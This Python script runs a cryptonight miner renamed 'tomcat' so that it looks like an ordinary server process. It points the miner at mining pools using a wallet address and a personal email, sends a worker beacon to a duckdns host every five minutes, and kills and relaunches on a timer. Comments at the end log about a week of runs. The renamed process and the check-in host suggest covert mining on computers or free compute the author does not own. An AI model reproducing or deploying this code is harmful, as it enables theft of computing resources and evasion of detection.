import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:01.722713
#2018-02-17 16:02:06.637838
#2018-02-17 17:51:05.510013
#2018-02-17 19:38:05.295087
#2018-02-17 21:26:01.583005
#2018-02-17 23:10:05.221101
#2018-02-18 00:57:01.647994
#2018-02-18 02:45:06.137349
#2018-02-18 04:35:05.375237
#2018-02-18 06:26:06.333737
#2018-02-18 08:15:07.319942
#2018-02-18 10:03:06.975799
#2018-02-18 11:50:04.427926
#2018-02-18 13:35:05.969606
#2018-02-18 15:25:06.969212
#2018-02-18 17:13:05.388885
#2018-02-18 19:01:06.528845
#2018-02-18 20:48:05.312483
#2018-02-18 22:35:06.704281
#2018-02-19 00:23:05.732001
#2018-02-19 02:09:01.780515
#2018-02-19 03:57:06.179679
#2018-02-19 05:43:05.259652
#2018-02-19 07:31:05.498099
#2018-02-19 09:21:02.182859
#2018-02-19 11:10:07.846562
#2018-02-19 12:57:01.917950
#2018-02-19 14:46:07.301486
#2018-02-19 16:35:07.316154
#2018-02-19 18:23:07.178918
#2018-02-19 20:08:06.292725
#2018-02-19 21:59:07.222442
#2018-02-19 23:44:11.017136
#2018-02-20 01:31:06.456248
#2018-02-20 03:19:06.959166
#2018-02-20 05:06:03.899057
#2018-02-20 06:49:05.305825
#2018-02-20 08:36:07.132353
#2018-02-20 10:20:02.251751
#2018-02-20 12:05:06.794351
#2018-02-20 13:52:07.612215
#2018-02-20 15:38:06.748654
#2018-02-20 17:24:08.962859
#2018-02-20 19:14:04.678390
#2018-02-20 21:04:04.420280
#2018-02-20 22:49:05.394989
#2018-02-21 00:33:01.858321
#2018-02-21 02:18:07.282622
#2018-02-21 04:05:04.130128
#2018-02-21 05:52:06.611634
#2018-02-21 07:40:07.337127
#2018-02-21 09:25:06.370049
#2018-02-21 11:14:08.921818
#2018-02-21 13:03:06.077771
#2018-02-21 14:52:12.309359
#2018-02-21 16:41:06.541897
#2018-02-21 18:31:07.491754
#2018-02-21 20:16:03.068144
#2018-02-21 22:04:02.128205
#2018-02-21 23:50:06.218758
#2018-02-22 01:43:07.064133
#2018-02-22 03:33:01.362042
#2018-02-22 05:21:01.260296
#2018-02-22 07:04:02.226313
#2018-02-22 08:52:02.084058
#2018-02-22 10:40:08.419876
#2018-02-22 12:28:08.496365
#2018-02-22 14:14:09.156746
#2018-02-22 16:02:09.736883
#2018-02-22 17:47:08.316006
#2018-02-22 19:35:08.537059
#2018-02-22 21:28:05.231970
#2018-02-22 23:15:02.733062
#2018-02-23 01:03:07.082905
#2018-02-23 02:50:04.427462
#2018-02-23 04:37:04.143324
#2018-02-23 06:23:01.231084
#2018-02-23 08:11:05.919157
#2018-02-23 10:23:08.209930
#2018-02-23 12:16:08.593935
#2018-02-23 14:03:07.473931
#2018-02-23 15:55:04.080174
#2018-02-23 17:41:01.423588
#2018-02-23 19:27:04.593089
#2018-02-23 21:11:07.967780
#2018-02-23 22:58:07.474637
#2018-02-24 00:45:06.612126
#2018-02-24 02:39:05.357502
#2018-02-24 05:13:03.894719
#2018-02-24 07:01:07.358845
#2018-02-24 08:36:06.374033
#2018-02-24 10:09:01.274974
#2018-02-24 11:56:02.025430
#2018-02-24 13:21:06.029644
#2018-02-24 14:53:01.484075
#2018-02-24 16:26:07.157328
#2018-02-24 18:02:05.146074
#2018-02-24 19:29:01.947859
#2018-02-24 21:04:04.637934
#2018-02-24 23:08:01.707213
#2018-02-25 01:30:08.807153
#2018-02-25 05:29:03.891656
#2018-02-25 11:35:08.576293